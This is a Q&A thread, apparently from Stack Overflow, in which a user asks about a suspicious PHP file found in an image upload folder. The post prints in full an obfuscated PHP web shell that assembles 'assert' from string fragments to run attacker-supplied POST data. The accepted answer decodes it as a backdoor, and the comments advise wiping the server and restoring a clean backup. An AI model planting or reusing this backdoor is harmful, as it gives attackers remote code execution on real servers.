# Unknown PHP file in my upload folder, isn't malicious code?

Tags: php

Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). Here is the script that i found in the directory.

errot_db.php

```
<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
```

Comment: This question belongs in security.stackexchange.com

Comment: If it's not an artifact of your code, it doesn't belong there.  Wipe away the entire output and re-deploy a known working copy.

Comment: @georoot do they really do uncrappify my wordpress kind of questions? Are you sure about that?

Comment: It's malicious. it tries to execute code the attacker pass to the file as a POST variable

Comment: *any* file you do not know about *is* an insecure file. you should wipe that server and restore a backup you know to be clean (something from *before* that file was created), change **all** of your passwords and inform your users of a potential leak. also: **validate your input!** user input is **never** to be trusted

Comment: IMHO if your question is "What does this malicious code do?" it could remain here at SO - and would be a very interesting question...

Answer (score 6, accepted):

This code hides the following statement:

```
@assert ($_POST[025]);
```

Which means it'll execute the PHP code send in the POST variable "025". So, yes, this is indeed a backdoor! I recommend asking on [security.stackexchange.com](https://security.stackexchange.com) for help on how to properly deal with the fallout.